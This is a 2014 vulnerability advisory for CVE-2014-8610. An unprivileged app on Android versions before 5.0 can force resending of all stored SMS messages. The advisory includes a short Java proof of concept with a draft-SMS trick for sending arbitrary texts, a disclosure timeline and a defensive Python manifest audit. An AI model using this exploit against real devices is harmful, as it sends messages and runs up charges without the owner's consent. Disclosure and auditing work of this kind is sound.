
Android SMS Resend
Posted Nov 26, 2014
Authored by WangTao, Zhang Donghui, WangYu

Android versions prior to 5.0 allow an unprivileged application to resend all the SMS messages stored on the user's phone.

tags | exploit
advisories | CVE-2014-8610
SHA-256 | 9954c7e735f97d8deaa62bdd4dd7a93cbbb3e11d2057e1ba006ba091a07683fc

INTRODUCTION
==================================
In Android <5.0, an unprivileged app can resend all the SMS messages stored on the user's phone to their corresponding recipients or senders, without user interaction.
It does not matter whether these SMS were sent to or received from other people. This may lead to undesired cost to the user.
Even worse, since Android also allows an unprivileged app to create a draft SMS, a bad app can combine the two tricks to send any SMS without any privilege requirement.

DETAILS
==================================
This vulnerability exists in the following source file of the Mms app:
https://android.googlesource.com/platform/packages/apps/Mms/+/android-4.4.4_r2.0.1/src/com/android/mms/transaction/SmsReceiverService.java
If a bad app broadcasts an intent with the action "com.android.mms.transaction.MESSAGE_SENT", it will reach the method "handleSmsSent". If the bad app can also control the result code to be RESULT_ERROR_RADIO_OFF, execution reaches the following conditional branch, where the SMS (determined by uri) is moved to a queue to be resent:

private void handleSmsSent(Intent intent, int error) {
    ...
    } else if ((mResultCode == SmsManager.RESULT_ERROR_RADIO_OFF) || (mResultCode == SmsManager.RESULT_ERROR_NO_SERVICE)) {
        if (Log.isLoggable(LogTag.TRANSACTION, Log.VERBOSE)) {
            Log.v(TAG, "handleSmsSent: no service, queuing message w/ uri: " + uri);
        }
        // We got an error with no service or no radio. Register for state changes so
        // when the status of the connection/radio changes, we can try to send the
        // queued up messages.
        registerForServiceStateChanges();
        // We couldn't send the message, put in the queue to retry later.
        Sms.moveMessageToFolder(this, uri, Sms.MESSAGE_TYPE_QUEUED, error);
    ...

The POC code is as follows:

Intent intent= new Intent("com.android.mms.transaction.MESSAGE_SENT");
intent.setData(Uri.parse("content://sms"));
intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiver");
sendOrderedBroadcast(intent,null,null,null,SmsManager.RESULT_ERROR_RADIO_OFF,null,null);

Some tips about the POC:
1. The uri is content://sms without an ID, which means all the SMS will be resent.
2. An explicit intent must be used.
3. With this version of sendOrderedBroadcast, the initial result code can be controlled.

Normally, once the SMS is moved to the queue, it will be sent automatically!

But can we craft any SMS message? Here is a trick:

Currently, any app can create a draft SMS without permission using a code snippet as follows:

Intent intent1 = new Intent("android.intent.action.SENDTO");
intent1.setData(Uri.parse("smsto:yourphonenumber"));
intent1.putExtra("sms_body", "another test sms1!");
startActivity(intent1);

After sending the above intent, the app can wait for a short time and then start another activity. This causes ComposeMessageActivity in the MMS app to call the method onStop(), which saves the draft into the database, from which it can be resent later. Thus we can craft any SMS message without any permission requirement.

This has been fixed in Android 5.0 (Android bug id 17671795):
https://android.googlesource.com/platform/packages/apps/Mms/+/008d6202fca4002a7dfe333f22377faa73585c67
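
As an added example (not part of the original advisory or of the Mms code base), the following Python audit lists the broadcast receivers in a decoded AndroidManifest.xml that, like the receiver targeted by the POC, can be reached by an explicit broadcast from any installed app: exported and with no android:permission. It generalizes from the one receiver in the advisory to every receiver in a manifest; the sample manifest and its component names are constructed, and the implicit-export default it models is the one used before Android 12.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed sample manifest (NOT the real Mms manifest); all names are hypothetical.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.messaging">
  <application>
    <receiver android:name=".SentStatusReceiver" android:exported="true"/>
    <receiver android:name=".PrivilegedReceiver"
              android:permission="android.permission.BROADCAST_SMS">
      <intent-filter><action android:name="android.provider.Telephony.SMS_DELIVER"/></intent-filter>
    </receiver>
    <receiver android:name=".BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
    <receiver android:name=".InternalReceiver"/>
  </application>
</manifest>"""


def effective_exported(elem):
    """Explicit android:exported wins; otherwise apply the pre-Android 12
    default: exported only if the component declares an intent-filter."""
    value = elem.get(ANDROID + "exported")
    if value is not None:
        return value.lower() == "true"
    return elem.find("intent-filter") is not None


def unprotected_receivers(manifest_xml):
    """Names of receivers that any installed app can target with an explicit
    broadcast: exported and guarded by no android:permission."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    findings = []
    for app in root.iter("application"):
        app_perm = app.get(ANDROID + "permission")  # inherited by components
        for recv in app.iter("receiver"):
            guarded = recv.get(ANDROID + "permission") or app_perm
            if effective_exported(recv) and not guarded:
                name = recv.get(ANDROID + "name", "")
                findings.append(package + name if name.startswith(".") else name)
    return findings


if __name__ == "__main__":
    for name in unprotected_receivers(SAMPLE_MANIFEST):
        print("exported without permission:", name)
```

A finding is not a vulnerability by itself: it marks receivers whose handlers must not trust the intent's data URI or the broadcast's initial result code, the two inputs that handleSmsSent acted on.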

TIMELINE
==================================
26.09.2014 Initial report to Android Security Team with the POC
27.09.2014 Reply from Android Security Team "are looking into it"
30.09.2014 Found that an app can create a draft; notified Android Security Team with an updated POC
02.10.2014 Reply from Android Security Team "We will fix this issue in the next major release"
04.11.2014 Android 5.0 source code is open; the fix for this issue is found in the change log; asked Android Security Team when this can be published
09.11.2014 Contact MITRE about this issue
20.11.2014 CVE-2014-8610 assigned
25.11.2014 Got permission from Android Security Team to publish this
26.11.2014 Public Disclosure

IDENTIFIERS
==================================
CVE-2014-8610
Android id 17671795

CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team

--
BAIDU X-TEAM (xteam.baidu.com)
An external link of this advisory can be found at http://xteam.baidu.com/?p=164

